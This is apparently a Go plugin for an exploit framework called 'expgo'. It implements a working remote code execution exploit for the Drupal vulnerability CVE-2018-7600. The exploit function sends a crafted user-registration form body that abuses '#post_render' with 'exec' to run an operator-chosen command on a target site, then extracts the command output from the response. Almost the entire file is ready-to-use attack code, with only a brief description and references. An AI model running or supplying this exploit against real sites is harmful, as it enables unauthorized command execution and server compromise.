CVE-2018-7600

package CVE_2018_7600

import (
    "context"
    "expgo/plugins/api/req"
    "expgo/plugins/api/types"
    "expgo/plugins/api/util"
    "fmt"
    "log"
    "net/url"
    "regexp"
    "time"
)

var (
    pluginType  = "custom"
    vulType     = "rce"
    name        = "CVE-2018-7600"
    component   = "drupal"
    author      = "akkuman"
    description = "Drupal 是一款用量庞大的CMS，其6/7/8版本的Form API中存在一处远程代码执行漏洞"
    references  = []string{
        "https://research.checkpoint.com/uncovering-drupalgeddon-2/",
        "https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md",
    }
    tags = []string{
        "drupal",
        "rce",
    }
)

var opts = types.NewOptions()

func init() {
    opts.String("target", true, "target", "", func(i interface{}) bool {
        target := i.(string)
        _, err := url.Parse(target)
        return err == nil
    })
    opts.String("cmd", true, "command", "id")
}

func exploit(ctx context.Context, params map[string]interface{}) types.PluginResult {
    c := req.NewHttpClient(ctx)
    log.Println("准备执行命令...")
    cmd := params["cmd"].(string)
    var result []struct {
        Data string `json:"data"`
    }
    cmd = url.QueryEscape(cmd)
    reqCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
    defer cancel()
    resp, err := c.R().SetContext(reqCtx).
        SetHeader("Content-Type", "application/x-www-form-urlencoded").
        SetResult(&result).
        SetBody(fmt.Sprintf(`form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=%s`, cmd)).
        Post(util.URLJoin(params["target"].(string), "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"))
    if reqCtx.Err() != nil {
        log.Println("命令执行成功或超时")
        return types.HitPluginResult
    }
    if err != nil {
        panic(err)
    }
    if resp.StatusCode() != 200 || len(result) == 0 {
        panic("执行失败")
    }
    pattern := regexp.MustCompile(`^(.*?)\<span class="ajax-new-content"\>\<\/span\>`)
    matches := pattern.FindAllStringSubmatch(result[0].Data, -1)
    if len(matches) == 0 || len(matches[0]) < 2 {
        return types.PluginResult{Success: false}
    }
    log.Printf("命令执行结果: %s", matches[0][1])
    return types.PluginResult{
        ExtendInfo: map[string]interface{}{
            "data": matches[0][1],
        },
        Success: true,
    }
}